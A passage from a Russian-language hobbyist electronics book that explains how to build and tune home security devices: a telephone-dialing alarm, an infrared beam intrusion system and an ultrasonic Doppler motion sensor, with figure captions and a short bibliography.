Катушка L1 диаметром 3 мм намотана проводом ПЭВ-1 0, 35 мм и содержит 5 витков.

В устройстве можно использовать приемники и передатчики с кварцевой стабилизацией частоты, что позволит повысить надежность системы в целом.

Рис. 6.49. Принципиальная схема блока кодирования

Изображение: 

Рис. 6.50. Печатная плата блока кодирования

Изображение: 

Рис. 6.51. Размещение деталей на плате блока кодирования

Изображение: 

Рис. 6.52. Принципиальная схема блока индикации

Изображение: 

Рис. 6.53. Принципиальная электрическая схема блока звуковой индикации

Изображение: 

Рис. 6.54. Печатная плата блока индикации

Изображение: 

Рис. 6.55. Размещение деталей на плате блока индикации

Изображение: 

Рис. 6.56. Схема передатчика блока кодирования

Изображение: 

Рис. 6.57. Приемное устройство блока кодирования

Изображение: 

6.2.3. Сторожевое устройство с телефонным вызовом.

6. 2. 3. Сторожевое устройство с телефонным вызовом

Сторожевое устройство может быть использовано для охраны любого объекта, на территории которого имеется доступ к телефонной линии. Оно позволяет фиксировать факт несанкционированного доступа на охраняемый объект и сообщать об этом путем дозвона по городской или местной телефонной линии до заранее выбранного абонента.

Устройство, принципиальная схема которого представлена на рис. 6. 58, позволяет осуществлять пять попыток дозвона. В течение каждой из этих попыток, на которые разбит полный цикл работы устройства, происходит сброс линии с последующим набором номера, заранее выбранного пользователем, и паузой ожидания. Время выполнения каждой попытки цикла составляет около 40 с.

Устройство может работать как самостоятельно, так и в составе другой системы сигнализации. Логика работы устройства такова. При включении питания оно формирует цикл задержки (около 40 с), необходимый для выхода из помещения и закрывания дверей. В это время устройство не реагирует на состояние охранных датчиков. По окончании заданного времени система переходит в режим охраны. При срабатывании одного из датчиков сторожевое устройство переходит в режим тревоги и автоматически вызывает абонента по заданному пользователем телефонному номеру.

Устройство выполнено на семи цифровых микросхемах и четырех транзисторах. Питание устройства осуществляется от любого источника стабилизированного напряжения 9—12 В, подключенного к сети переменного тока. В случае пропадания сетевого напряжения питание устройства осуществляется от резервного источника постоянного тока GB1, подзарядка которого происходит через резистор R22. Питание микросхемы DD7 осуществляется постоянно через резистор R21. Это необходимо для того, чтобы сохранить в памяти микросхемы DD7 информацию о последнем набранном номере.

Пользователь набирает необходимый номер перед выходом из помещения или делает это заранее. Происходит это следующим образом. Нажимается и удерживается в нажатом состоянии кнопка SB4. При этом на выводе 15 микросхемы DD7 уровень логической единицы, определяющий команду «Отбой», сменяется на уровень логического нуля. Транзистор VT3 закрывается, т. к. на аноды диодов VD5, VD6 поступают уровни логического нуля.

Током, протекающим через сопротивление резистора R19 и светодиод HL2, открывается транзистор VT4, что эквивалентно поднятию трубки телефонного аппарата — линия занята. Кнопками SB5—SB16 клавиатуры набирается телефонный номер абонента. При этом на базу транзистора VT3, через токоограничивающий резистор R 18, поступают импульсы набора номера. Это приводит к периодическому открыванию и закрыванию транзисторов VT3, VT4 и, как следствие, к коммутации телефонной линии. Контроль набора номера осуществляется с помощью светодиода HL2. После окончания набора кнопку SB4 необходимо отпустить. Положительное напряжение, поступающее на вывод 15 микросхемы DD7, приводит к формированию сигнала «Отбой», транзистор VT4 закрывается и освобождает линию. Набранный номер остается в памяти электронного номеронабирателя.

Для перевода устройства в режим охраны необходимо нажать кнопку SB1. При этом положительное напряжение источника питания подается на элементы схемы. Триггер, выполненный на элементах DD1. 1, DD1. 2, устанавливается (положительным импульсом на выводе 1) в состояние, при котором на выводе 4 элемента DD1. 2 появляется положительное напряжение, что приводит к открыванию транзистора VT1. Открытый транзистор VT1 шунтирует кнопку SB1, при отпускании которой питание с устройства не снимается. Одновременно положительным импульсом, сформированным цепью R3C3, счетчики микросхемы DD2

6-2-31.jpg

Рис. 6. 58. Принципиальная схема сторожевого устройства с телефонным вызовом

устанавливаются в нулевое состояние. Таким же образом импульсы, сформированные цепью R10C7, устанавливают триггеры DD5. 2, DD6. 1, DD6. 2 в нулевое состояние, а триггер DD5. 1 — в единичное. При этом уровень логической единицы с вывода 13 триггера DD5. 1 закрывает элемент DD4. 2, а уровень логического нуля с вывода 12 триггера DD5. 1 блокирует элемент DD4. 3. Включается светодиод HL1, индицируя включение режима охраны и начало отсчета времени задержки. Уровень логической единицы с выхода Т4 (вывод 2) микросхемы DD2 открывает ключ на элементе DD3. 2, подключая конденсатор С5 параллельно конденсатору С4, уменьшая тем самым частоту импульсов тактового генератора G микросхемы DD2. Длительность единичного состояния на выходе Т4 DD2, определяется постоянной времени цепи R4R5C4C5 и счетчиком-делителем микросхемы DD2. При номиналах резисторов и конденсаторов, указанных на схеме, это время составит около 35 с. Этого вполне достаточно, чтобы выйти из помещения и закрыть за собой дверь. При этом датчики устройства будут заблокированы. По спаду импульса на выходе Т4 дифференцирующей цепью R9C6 сформируется короткий отрицательный импульс, который инвертируется элементом DD4. 1. Этот импульс поступает на вход S триггера DD5. 2 (вывод 6) и устанавливает его в единичное состояние, чем переводит устройство в режим охраны. Триггер DD5. 1 переключается в нулевое состояние: светодиод HL1 выключается, элементы DD4. 2, DD4. 3 разблокируются. Уровень логического нуля с вывода 2 триггера DD5. 2 снимает блокировку с элемента DD1. 3. Уровень логической единицы с вывода 11 элемента DD 1. 4 через диод VD3 поступает на входы R микросхемы DD2, обнуляя и блокируя счетчики.

При срабатывании охранного датчика SB2 уровень логической единицы с вывода 10 элемента DD1. 3 устанавливает триггер DD6. 1 в единичное состояние. Счетчики микросхемы DD2 разблокируются. Устройство отрабатывает время задержки перехода в режим тревоги, необходимое для отключения его пользователем. Для этого необходимо нажать на кнопку SB3. Уровень логической единицы с вывода 13 триггера DD6. 2 переключит триггер на элементах DD1. 1, DD1. 2 и через ключ DD3. 1 блокирует генератор тактовых импульсов. Транзистор VT1 закрывается и устройство отключается от источника питания. Если за время задержки (около 35 с) устройство не будет выключено кнопкой SB3, то оно переходит в режим тревоги. В этом режиме система работает по описанному ниже алгоритму.

Необходимые для коммутации линии и набора номера задержки обеспечиваются фазовым сдвигом между импульсами на выходах Т1 и ТЗ микросхемы DD2 и составляют примерно 1 с. При этом генератора G работает на высокой частоте (конденсатор С5 отключен). Положительный импульс с выхода Т1 инвертируется элементом DD4. 2 и закрывает транзистор VT2, что эквивалентно действию сигнала «Отбой». Импульс с выхода ТЗ через элементы DD4. 3 и DD3. 3 открывает аналоговый ключ DD3. 4, что приводит к замыканию между собой выводов 5 и 19 микросхемы DD7. Это вызывает, как. и. нажатие клавиши с символом «Т», повторный набор последнего набранного номера.

Таким образом получается, что отрицательный импульс с выхода М микросхемы DD2 разрешает подключение устройства к линии, положительный импульс с выхода Т1 длительностью примерно 1 с вызывает сброс линии, а следующий за ним после паузы (выход Т2) положительный импульс с выхода ТЗ вызывает повторный набор последнего запомненного номера. Положительный импульс с выхода Т4 определяет время, необходимое для набора номера и дозвона до абонента.

По окончании полного цикла (5 попыток дозвона) уровень логической единицы на выходе М счетчика микросхемы DD2 открывает ключ DD3. 1 и прекращает работу генератора.

Устройство собрано на печатной плате из двухстороннего фольгированного стеклотекстолпта, чертеж которой представлен на рис.6. 59.

В устройстве используются электролитические конденсаторы К50-16, К50-35 или другие, подходящие по размеру. Резисторы — типа МЛТ-0, 125. Диоды можно использовать типа КД521, КД510 и т. п. Источник питания GB — типа 7Д-0. 125 или НИКА. Размещение деталей на плате показано на рис. 6. 60.

6-2-32.jpg

Рис. 6. 59. Печатная плата охранного устройства с телефонным вызовом

6-2-33.jpg

Рис. 6. 60. Размещение деталей на плате устройства

При безошибочном монтаже налаживание охранного устройства сводится к подбору емкости конденсаторов С4 и С5 до получения желаемой длительности цикла.

Для питания устройства необходим источник питания с напряжением 10— 13 В и током до 100 мА. Плату можно разместить в корпус телефона-трубки, использовав уже имеющуюся клавиатуру.

Рис. 6.58. Принципиальная схема сторожевого устройства с телефонным вызовом

Изображение: 

Рис. 6.59. Печатная плата охранного устройства с телефонным вызовом

Изображение: 

Рис. 6.60. Размещение деталей на плате устройства

Изображение: 

6.2.4. Система охранной сигнализации на ИК лучах.

6. 2. 4. Система охранной сигнализации на ИК лучах

Система предназначена для охраны квартир, офисов, коттеджей, музеев, земельных участков, дач и других объектов. Действие системы основано на использовании ИК датчиков. Режим тревоги включается при пересечении нарушителем инфракрасного луча. К одному блоку системы может быть подключено до 10 охранных датчиков. Все датчики подключены параллельно к одной четырехпроводной линии. Система позволяет не только определить факт незаконного вторжения на охраняемую территорию, но и выдает информацию о местоположении сработавшего датчика включением соответствующего светодиода. Таким образом, установив светодиоды на карте или схеме объекта можно быстро определить место вторжения, а по очередности зажигания светодиодов — направление перемещения нарушителя.

Система состоит из ИК передатчиков и приемников (до 10 блоков), а также блоков индикации и сигнализации.

Принципиальная схема блока ИК передатчика представлена на рис. 6. 61.

Задающий генератор блока выполнен на элементах DD1. 1, DD1. 2, резисторах Rl, R2 и конденсаторе С1. С выхода генератора прямоугольные импульсы частотой 16 кГц поступают на усилитель мощности, выполненный на элементах DD1. 3, DD1. 4, включенных параллельно. С выхода последнего импульсы по-

6-2-41.jpg

Рис. 6. 61. Блок ИК передатчика охранной сигнализации

ступают на ключевой каскад, выполненный на транзисторе VT1. Нагрузкой транзистора VT1 служит ИК светодиод VD1. Резистор R4 ограничивает ток, протекающий через диод VD1 и транзистор VT1. Питается блок от источника постоянного тока напряжения 9 В. Блок ИК передатчика собран на отдельной плате и помещен во влагозащитный корпус. Печатная плата и размещение деталей на ней приведены на рис. 6. 62.

6-2-42.jpg

Рис. 6. 62. Печатная плата ИК передатчика и размещение деталей на ней

Блок ИК приемника располагается на расстоянии не более 10 м от передатчика. ИК приемник усиливает сигнал до уровня срабатывания КМОП микросхем. Принципиальная схема ИК приемника приведена на рис. 6. 63. Приемник собран на 2 микросхемах и 2 транзисторах.

6-2-43.jpg

Рис. 6. 63. Принципиальная схема ИК приемника

6-2-44.jpg

Рис. 6. 64. Печатная плата ИК приемника

На операционном усилителе DA1 собран преобразователь тока фотодиода VD1 в напряжение. Подавление синфазной помехи в нем достигает 70 дБ. Цепь R3R4C1 формирует необходимую для подавления паразитной низкочастотной помехи, вызванной излучением ламп накаливания, АЧХ и определяет коэффициент передачи по напряжению усилителя. Каскад на транзисторе VT1 усиливает, а ключ на транзисторе VT2 окончательно формирует полезный сигнал фотоприемника. Диод VD2 включен для ускорения процесса перезарядки конденсатора СЗ.

В то время когда луч не прерывается нарушителем, на коллекторе транзистора VT2 и на выходе 2 блока присутствует последовательность импульсов

6-2-45.jpg

Рис. 6. 65. Размещение деталей на плате ИК приемника

6-2-46.jpg

Рис. 6. 66. Схема блока индикации системы сигнализации

с частотой 16 кГц. Но это происходит только тогда, когда счетчик DD1 установлен в состояние, соответствующее номеру данного блока. При пересечении нарушителем луча импульсы на выходе 2 блока пропадают. Счетчик DD1 управляется импульсами, поступающими на вывод 4 блока.

Печатная плата ИК приемника выполнена из фольгированного стеклотекстолита, ее чертеж приведен на рис. 6. 64. На рис. 6. 65 показано размещение деталей на плате.

Принципиальная схема основного блока — блока индикации, приведена на рис. 6. 66. Он рассчитан на подключение до 10 блоков ИК приемников (по количеству ИК передатчиков).

На элементах DD10. 2 и DD10. 3 выполнен генератор тактовых импульсов частотой 600 Гц. При включении питания цепь R5C6 формирует отрицательный импульс, блокирующий генератор по выводу 8. После заряда конденсатора Сб до уровня логической единицы генератор начинает работать. Импульсы с его выхода CN (вывод 10 DD10. 3) поступают на вход счетчика DD1 (вывод 14), а также на входы блоков приемников через контакт 4 платы. Таким образом, счетчики датчиков и счетчик DD1 основного блока работают синхронно, и в каждый момент времени на вход 2 блока индикации поступают импульсы частотой 16 кГц только от одного из блоков приемников. Очередность работы приемных блоков определяется подключением катода диода VD3 к выходам счетчика DD1 (рис. 6. 63). При появлении логической единицы на соответствующем выходе счетчика диод VD3 закрывается, разрешая проход импульсов на базу транзистора VT2.

С вывода 2 основного блока (рис. 6. 66) эти импульсы через конденсатор С1 поступают на детектор, выполненный на диодах VD1, VD2. При этом на выводах 5 и 6 элемента DD10. 1 будет уровень логической единицы а при отсутствии импульсов — уровень логического нуля. Таким образом, сигнал, информирующий о состоянии датчика, включенного в данный момент, через инвертор DD10. 1 поступает на вентили DD2. 1, DD2. 3, DD3. 1, DD4. 3, DD5. 1, DD5. 3, DD6. 1 и DD6. 3. Их выходы через соответствующие инверторы подключены ко входам R триггеров DD7, DD8, DD9. По какой из цепей и на вход какого именно триггера поступит сигнал, зависит от состояния счетчика DD1, а следовательно, и от номера подключенного датчика. К выходам триггеров подключены светодиодные индикаторы HL1 —HL10. Диоды VD3—VD12, резистор R17, R18 и микросхема DD11 образуют звуковое сигнальное устройство.

При отсутствии нарушения (пересечения луча) на выходе инвертора DD10. 1 (вывод 4) будет уровень логического нуля, коммутаторы будут закрыты и на входы триггеров сигналы со счетчика не поступят. Устройство находится в дежурном режиме. При пересечении луча одного из датчиков на выходе элемента DD10. 1 (вывод 4) появится положительный импульс длительностью, равной одному такту, разрешающий прохождение сигнала с одного из выходов счетчика на вход соответствующего триггера. Триггер переключается в противоположное состояние, включится светодиод, соответствующий номеру сработавшего датчика, и раздастся звуковой сигнал тревоги. Установка триггеров в исходное состояние осуществляется кнопкой SB1 или, при включении питания, цепью С5, R6.

6-2-47.jpg

Рис. 6. 68. Размещение деталей на плате основного блока

Основной блок выполнен на печатной плате размером 85х105 мм из двухстороннего фольгированного стеклотекстолита. Чертеж платы представлен на рис. 6. 67, а размещение деталей на ней — на рис. 6. 68.

Настройка устройства заключается в установке частот генераторов тактовых импульсов подбором сопротивления резистора R2 (рис. 6. 61) до получения на выходе элементов DD1. 3, DD1. 4 частоты 16 кГц и подбором сопротивления резистора R4 (рис. 6. 66) до получения на выводе 10 элемента DD10. 3 частоты 600 Гц.

В качестве блоков передатчиков и приемников можно использовать готовые блоки от систем дистанционного управления телевизорами, немного доработав их.

Рис. 6.61. Блок ИК передатчика охранной сигнализации

Изображение: 

Рис. 6.62. Печатная плата ИК передатчика и размещение деталей на ней

Изображение: 

Рис. 6.63. Принципиальная схема ИК приемника

Изображение: 

Рис. 6.64. Печатная плата ИК приемника

Изображение: 

Рис. 6.65. Размещение деталей на плате ИК приемника

Изображение: 

Рис. 6.66. Схема блока индикации системы сигнализации

Изображение: 

Рис. 6.68. Размещение деталей на плате основного блока

Изображение: 

6.2.5. Ультразвуковой датчик системы охранной сигнализации.

6. 2. 5. Ультразвуковой датчик системы охранной сигнализации

На первоначальном этапе разработки ультразвуковых датчиков системы обнаружения движущегося объекта строили так, как это схематически показано на рис. 6. 69, а. Излучатель BF1 и приемник ВМ1 располагали на противоположных стенах помещения, под потолком (для снижения влияния внутренней обстановки). Излучатель BF1 возбуждал в пространстве помещения стабильные по частоте и амплитуде ультразвуковые колебания. Микрофон (приемник) ВМ1 преобразовывал принятый из пространства ультразвуковой сигнал в электрический. Далее, в электронном устройстве этот сигнал усиливался, детектировался и анализировался по амплитуде. В случае колебания амплитуды ультразвукового сигнала формировался сигнал тревоги.

6-2-51.jpg

Рис. 6. 69. Построение ультразвуковых систем обнаружения

Отчего же происходят колебания амплитуды принятого ультразвукового сигнала? Предположим, что помещение идеально, т. е. представляет собой герметически замкнутое пространство, ограниченное жесткими стенами. Поскольку излучение не является остронаправленным, к микрофону ВМ1 вместе с прямой волной приходят волны, отраженные от стен, потолка и пола. Энергия волны в зоне микрофона ВМ1, как, впрочем, и на любой поверхности помещения, есть результат интерференции всех подающих волн. Пока в помещении не происходит какого-либо перемещения отражающих или поглощающих поверхностей или изменения физических свойств среды, интерференционная картина, а значит и уровень энергии волны в каждой точке, будут постоянны.

Любое движение в помещении приведет к изменению пути прохождения ультразвуковых волн, а следовательно, к изменениям интерференционной картины. Это приведет к колебаниям амплитуды выходного сигнала микрофона ВМ1. Регистрируя эти колебания, можно обнаружить перемещение в замкнутом пространстве.

Данный способ обнаружения подвижных объектов обеспечивает очень высокую чувствительность при высокой экономичности, поскольку волна от излучателя BF1 к приемнику ВМ1 проходит через помещение по наиболее короткому пути, а следовательно имеет наименьшее затухание.

Однако в реальных условиях эта система практически неработоспособна из-за чрезвычайно высокой вероятности ложных срабатываний. Система реагирует даже на поток воздуха, т. к. сложение скорости звука со скоростью воздуха изменит характер прохождения волны, что будет воспринято микрофоном ВМ1 как перемещение объекта.

Для повышения устойчивости системы излучатель BF1 и приемник ВМ1 располагают на одной стене (рис. 6. 69, б). Длина пути волны увеличивается в два раза, что потребует значительного увеличения излучаемой мощности. Но при этом из-за того, что волна проходит через поток воздуха дважды — туда и обратно, приращение скорости взаимно компенсируется, что и повышает устойчивость устройства к ложным срабатываниям в условиях относительно равномерных потоков воздуха, движущихся в любых направлениях.

В реальных условиях потоки воздуха могут быть весьма неравномерными. Кроме того, существенный вклад в нестабильность интерференционной картины в реальном помещении вносят деформации стекол и дверей в результате порывов ветра снаружи, разного рода вибрации и другие факторы. Все это привело к тому, что охранная система, построения по описанному выше принципу, оказалась нежизнеспособной.

Существенно повысить помехоустойчивость позволяет применение иного метода детектирования сигнала — не по амплитуде, а по частоте. Если объект перемещается вдоль направления распространения волны (рис. 6. 69, б), отраженная от него волна будет иметь некоторое смещение по частоте относительно излучаемой. Это явление получило название эффекта Доплера. Из-за разно-направленного отражения волн в реальном помещении эффект Доплера проявляется и при строго перпендикулярном указанному перемещению объекта, правда, несколько слабее. Поэтому объект, движущийся в любом направлении, будет обнаружен.

6-2-52.jpg

Рис. 6. 70. Структурная схема ультразвукового датчика

Несмотря на достоинства, детектирование с использованием эффекта Доплера не снимает полностью проблему ложных срабатываний. Существует определенный предел интенсивности воздушных потоков и других факторов, выше которого датчик будет регистрировать ложные перемещения.

Структурная схема ультразвукового доплеровского датчика представлена на рис. 6. 70. В качестве излучателя BF1 и приемника ВМ1, как правило, используют высокоэффективные резонаторы из пьезокерамики.

В состав аппаратной части ультразвукового датчика входят следующие блоки:

излучатель BF1; приемник ВМ1; эталонный генератор G1; входной усилитель А1; преобразователь U1; фазовый детектор U2; фильтр нижних частотZ1;

фильтр верхних частот Z2; детектор-формирователь U3; выходной усилитель А2; устройство индикации HI.

Излучатель BF1 ультразвуковой волны служит нагрузкой эталонного генератора G1. Рабочую частоту выбирают как компромисс между помехоустойчивостью и затуханием ультразвуковых колебаний в воздухе. Чем больше частота, тем меньше мешающее влияние естественных и искусственных шумов, воспринимаемых датчиком, однако с увеличением частоты повышается затухание волны, и для нормальной работы датчика необходимо увеличивать мощность излучения (пропорционально квадрату частоты). Наиболее подходящей является частота около 40 кГц. Мощность излучения выбирается из соображений приемлемой экономичности, требуемого уровня принимаемого сигнала и объема контролируемого пространства.

Входной усилитель А1 должен обеспечивать уверенный прием отраженного сигнала в условиях значительного колебания его амплитуды. Для снижения влияния помех необходима высокая избирательность усилителя в интервале fg ± fd- где fg — рабочая частота генератора, fd — доплеровский сдвиг, реально не превышающий 1 кГц.

Для исключения зависимости входного сигнала от амплитудной составляющей в усиленном принятом сигнале выделяют точки перехода через «нуль» и формируют сигнал прямоугольной формы. Эту функцию выполняет преобразователь U1.

Заметим здесь, что понятие о частотном доплеровском сдвиге не вполне корректно, поскольку реальный входной сигнал будет представлять собой частотный спектр. Если, например, движущийся объект представляет собой цельную отражающую поверхность, вместе с сигналом основной частоты будет присутствовать сигнал доплеровского сдвига, амплитуда которого будет пропорциональна отношению энергии волны, приходящей от объекта, к энергии всех приходящих волн. Иначе говоря, амплитуда сигнала доплеровского сдвига будет зависеть от площади объекта.

Если волна, отраженная от движущегося объекта, по амплитуде не превышает сумму волн, отраженных от стен помещения, то сигнал после преобразователя будет иметь фазовую, а не частотную модуляцию. В противном случае, к фазовой добавится частотная модуляция.

Вместе с отраженными от стен, приемник зафиксирует и волны, отраженные от всех поверхностей объекта, причем амплитуда и частота этих волн будет зависеть соответственно от площади отражающих поверхностей и от скорости перемещения их в пространстве. Фазовая модуляция будет отражать все движения, производимые объектом.

Фазовый детектор U2 преобразует фазовую модуляцию сигнала в широтно-импульсную. Фильтр нижних частот Z1 сглаживает импульсы с выхода фазового детектора U2 и преобразует их в амплитудно-модулированный сигнал. Частота среза фильтра Z 1 равна реальной верхней частоте доплеровского сдвига, в нашем случае 1 кГц.

Фильтр верхних частот Z2 ограничивает снизу частотную полосу, воспринимаемую устройством. Он играет особую роль в устойчивости всей системы к ложным срабатываниям.

Как было отмечено выше, основной причиной возникновения амплитудной модуляции на входе датчика является изменение интерференционной картины в охраняемом пространстве, из-за чего происходит сложение множества волн с произвольной фазой и амплитудой. Изменение амплитуды какой-либо из них, например в результате изменения угла отражения от колеблющегося оконного стекла, вызывает изменение фазы результирующего сигнала. Сложение амплитудно-модулированного сигнала и немодулированного колебания одной и той же частоты уже приводит к фазовому сдвигу, пропорциональному производной от модулирующей функции. Из этого следует, что вибрацию стекла датчик воспримет как доплеровский сдвиг. Спектр этих колебаний, в основном, сосредоточен в частотной области ниже 1—3 Гц. Теперь становится понятна и та особая роль, которая отведена фильтру Z2, особенно исходя из требований по регистрации минимальной скорости передвижения.

Детектор-формирователь U3 преобразует огибающую принимаемого сигнала в пропорциональное ей постоянное напряжение. Усилитель А2 усиливает его до уровня, необходимого для работы устройства индикации HI, обеспечивая при этом определенную задержку, дополнительно снижающую вероятность ложных срабатываний.

Принципиальная схема ультразвукового датчика изображена на рис. 6. 71. Излучателем BF1 и приемником ВМ1 ультразвуковых колебаний служат пьезоэлектрические микрофоны типа УМ-1 с частотой резонанса в интервале 36—46 кГц.

Генератор G1 собран на микросхемах DD1 и DA4 по мостовой схеме. Это сделано для того, чтобы обеспечить оптимальный уровень мощности излучения

6-2-53.jpg

Рис. 6. 71. Ультразвуковой датчик охранной сигнализации

при низком напряжении питания. Кроме того, мостовое включение позволяет возбудить пьезорезонатор BF1 на его собственной резонансной частоте.

Ультразвуковой излучатель BF1 включен между выходами попарно параллельно включенных инверторов DD1. 1, DD1. 2 и DD1. 3, DD1. 4, образующих мостовой выходной усилитель. Сигналы на выходах каждой пары инверторов находятся в противофазе, что позволяет обеспечить амплитудное значение напряжения на излучателе BF1 практически вдвое больше, чем напряжение питания. Параллельное включение инверторов повышает нагрузочную способность усилителя. При необходимости их число в каждом плече может быть увеличено.

Поскольку рабочую частоту генератора определяет собственная частота резонанса тока излучателя BF1, в его цепь включены датчики тока — резисторы R17 и R18. Для выделения сигнала с датчиков тока на фоне высокого амплитудного выходного напряжения мостового усилителя служат прецизионные резисторные делители R19, R20 и R21, R22. Сопротивления резисторов определяются из выражений: R20=R19+ R17 и R21=R22+ R18. Если исключить нагрузку, то и постоянное напряжение, и переменное между точками А и Б будут пропорциональны току через нагрузку.

Напряжение UAБ подано на вход дифференциального усилителя переменного напряжения, собранного на микросхеме DA4. Уровень выходного напряжения усилителя соответствует уровню срабатывания инверторов КМОП микросхемы DD1. Одновременно дифференциальный усилитель подавляет незначительную синфазную составляющую напряжения UAБ. появляющуюся из-за неизбежных отклонений сопротивлений резисторов прецизионного делителя от расчетного и возможной неидентичности значений выходных напряжений инверторов моста. Резистор R25 определяет ток, потребляемый операционным усилителем DA4, и, как следствие, скорость нарастания выходного напряжения. Емкость конденсаторов С10 и С11 имеет оптимум для каждой конкретной частоты.

Буферный инвертор DD1. 5 формирует импульсы с крутыми фронтами, что позволяет повысить КПД генератора на 20%.

Первая ступень усиления сигнала с микрофона ВМ1 выполнена на операционном усилителе DA1. Микрофон включен в цепь отрицательной обратной связи операционного усилителя так, чтобы обеспечить максимальное усиление лишь на его резонансной частоте. Вторая ступень усиления выполнена на операционном усилителе DA2, в цепь отрицательной обратной связи которого включен двойной Т-мост, настроенный на ту же резонансную частоту. Диоды VD1 и VD2 служат для ограничения выходного сигнала и предотвращения перегрузки операционного усилителя в случае, если энергия волны на входе приемника будет слишком велика.

Компаратор DA3 преобразует усиленный сигнал в импульсы прямоугольной формы, перепады которых соответствуют моментам перехода сигнала через нулевой уровень. При этом обеспечивается скважность импульсов, практически равная 2. Эти импульсы поступают на фазовый детектор, выполненный на элементе DD2. 1 (вывод 1). На второй вход фазового детектора (вывод 2 элемента DD2. 1) поступают импульсы с образцового генератора (вывод 6 элемента DD1. 5),

6-2-54.jpg

Рис. 6. 72. Цифровой фильтр ультразвукового датчика

имеющие скважность 2. В противном случае, не исключены случайные «провалы» в характеристике чувствительности датчика в моменты, когда образцовый и принятый сигналы окажутся в фазе или противофазе.

Сигнал с выхода фазового детектора (вывод 3 элемента DD2. 1), равный разности фаз принятого и образцового сигналов, представляет собой последовательность прямоугольных импульсов с широтно-импульсной модуляцией и поступает на вход цифрового полосового фильтра.

Цифровой полосовой фильтр (рис. 6. 72) выполнен на микросхемах DD1 — DD11. По сравнению с фильтрами, выполненными на дискретных и аналоговых элементах, цифровые фильтры более просты, надежны и не нуждаются в настройке. К тому же они имеют практически прямоугольную амплитудно-частотную характеристику, что приближает их к идеальному фильтру.

Цифровой фильтр, приведенный на рис. 6. 72, состоит из фильтра нижних и верхних частот, схем формирования коротких импульсов, решающего устройства, устройства индикации движения и образцового генератора.

Образцовый генератор выполнен на специализированной часовой микросхеме К176ИЕ12. Частота задающего генератора стабилизирована кварцевым резонатором ZQ1. С выхода генератора импульсы с частотой следования 32768 Гц поступают на встроенный делитель, с выхода S которого (вывод 6) снимается сигнал с частотой 2 Гц, а с выхода F — сигнал частотой 1024 Гц (вывод 11).

Сигнал с выхода фазового детектора (элемент DD2. 1 на рис. 6. 71) поступает на входы двух формирователей коротких импульсов на микросхемах DD1, DD3. На входы двух других формирователей (DD2 и DD4) с генератора на микросхеме DD11 поступают прямоугольные импульсы частотой 2 Гц и 1024 Гц соответственно. С выходов формирователей (выводы 11 микросхем DD1, DD2 и DD3, DD4) короткие отрицательные импульсы поступают на входы триггеров на элементах DD7. 1, DD7. 2 и DD7. 3, DD7. 4 соответственно.

Рассмотрим случай, когда частота входного сигнала равна, например, 200 Гц. В этом случае на выводе 3 элемента DD8. 1 будут присутствовать короткие отрицательные импульсы, а на выводе 4 элемента DD8. 2 — уровень логической единицы (при частоте менее 2 Гц сигналы поменяются местами). При этом триггер на элементах DD8. 3, DD8. 4 переключится в состояние, когда на его выходе (вывод 11 элемента DD8. 3) будет уровень логической единицы.

Одновременно сигнал частотой 200 Гц поступает на второй канал фильтра, где он сравнивается с сигналом генератора частотой 1024 Гц. При этом на выводе 4 элемента DD9. 2 будут присутствовать короткие отрицательные импульсы. В то же время на выводе 3 элемента DD9. 1 будет уровень логической единицы (при входной частоте более 1024 Гц сигналы на выходах этих элементов поменяются местами). Эти отрицательные импульсы переключат триггер на элементах DD9. 3, DD9. 4 в состояние, когда на его выходе (выход 10 элемента DD9. 4) будет уровень логической единицы. С триггеров сигналы высокого логического уровня поступают на устройство принятия решения на элементе DD10. 1, при этом на выходе последнего (вывод 3) появится уровень логического нуля. Конденсатор СЗ начнет разряжаться через сопротивление резистора R4 до уровня

6-2-55.jpg

Рис. 6. 73. Печатная плата датчика

переключения инвертора DD10. 2. В момент переключения последнего и включится индикатор HL1. Элементы VD1, R4, СЗ осуществляют задержку сигнала, что способствует повышению помехоустойчивости датчика.

Индикатор HL1 включается только в те моменты, когда частота входного сигнала более 2 Гц, но менее 1024 Гц. В иных случаях индикатор выключен и датчик не дает сигнала о наличии движущегося объекта.

6-2-56.jpg

Рис. 6. 74. Размещение деталей на плате датчика

Узел на операционном усилителе DA5 (рис. 6. 71) выполняет функцию формирователя «мнимого нуля» напряжения питания, необходимого для нормальной работы операционных усилителей датчика. Он обеспечивает выходное напряжение, равное половине напряжения источника питания при низком выходном сопротивлении.

Налаживание датчика обычно не вызывает трудностей. Сначала настраивают двойной Т-мост в цепи обратной связи операционного усилителя DA2 на частоту образцового генератора путем одновременного подбора сопротивлений резисторов R4, R5, R6 (или емкости конденсаторов СЗ—С5), соотношение номиналов их при этом не должно измениться.

Резисторы R19—R22 (рис. 6. 71) можно подобрать из обычных МЛТ-0, 125 номиналом 20 кОм с помощью цифрового тестера. Их сопротивление от указанного на схеме может отличаться на 20%, однако соотношение значений сопротивления, указанное выше, должно быть выдержано с точностью не хуже 0, 25%. При большой разнице не исключены фазовые сбои и даже срыв генерации.

6-2-57.jpg

Рис. 6. 75. Печатная плата цифрового фильтра

Цифровой полосовой фильтр (рис. 6. 72) в настройке не нуждается. Нижнюю границу фильтра можно увеличить до 17 Гц. Для этого на вход формирователя на микросхеме DD4 необходимо подать импульсы с выхода М (вывод 10) микросхемы DD11, а не с выхода F, как показано на схеме.

Устройство выполнено на двух печатных платах размером 301 60х108 мм каждая. Платы изготовлены из двухстороннего фольгированного стеклотекстолита. Печатная плата ультразвукового датчика приведена на рис. 6.73, а размещение элементов на ней — на рис. 6.74. Печатная плата цифрового фильтра представлена на рис. 6.75, размещение элементов на ней — на рис. 6.76. Платы монтируются одна над другой на металлических стойках высотой не менее 20 мм. Ультразвуковые приемник и излучатель могут быть расположены под некоторым углом друг к другу.

Ультразвуковой датчик устанавливается в таком месте, чтобы можно было контролировать все входы и выходы и в помещение нельзя было попасть, миновав поле зрения ультразвукового «глаза» (рис. 6. 77).

Для предотвращения ложного срабатывания излучатель нельзя располагать под прямым углом к вибрирующим поверхностям, типа дверей и окон или направлять на место с наибольшей циркуляцией воздуха, например на лестницы и батареи отопления.

Рис. 6.69. Построение ультразвуковых систем обнаружения

Изображение: 

Рис. 6.70. Структурная схема ультразвукового датчика

Изображение: 

Рис. 6.71. Ультразвуковой датчик охранной сигнализации

Изображение: 

Рис. 6.72. Цифровой фильтр ультразвукового датчика

Изображение: 

Рис. 6.73. Печатная плата датчика

Изображение: 

Рис. 6.74. Размещение деталей на плате датчика

Изображение: 

Рис. 6.75. Печатная плата цифрового фильтра

Изображение: 

7. Литература.

ЛИТЕРАТУРА

1. Охранные системы. Информационное издание. Выпуск 4, М., «Солон», 1996 г.

2. Гавриш В. Практическое пособие по защите коммерческой тайны. Симфе рополь. «Таврида». 1994 г.

